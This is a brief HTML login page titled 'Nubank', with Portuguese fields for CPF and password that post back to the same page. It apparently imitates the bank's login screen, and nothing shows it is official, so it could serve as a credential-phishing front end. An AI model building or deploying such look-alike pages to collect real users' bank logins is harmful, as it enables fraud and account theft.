<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="/static/style.css">
    <title>Nubank</title>
</head>
<body>
    <div id="Panel">
        <h1>Faça seu login</h1>
        <form action="" method="post">
        <label for="CPF">CPF</label>
        <input type="text" name="CPF" id="CPF" required>
        <label for="Password">Senha</label>
        <input type="password" name="Password" id="Senha" required>
        <input type="submit" value="Continuar">
        </form>

        <a href=""><h2>Esqueci minha senha ></h2></a>
        <a href=""><h2>Ainda não sou cliente ></h2></a>
    </div>
</body>
</html>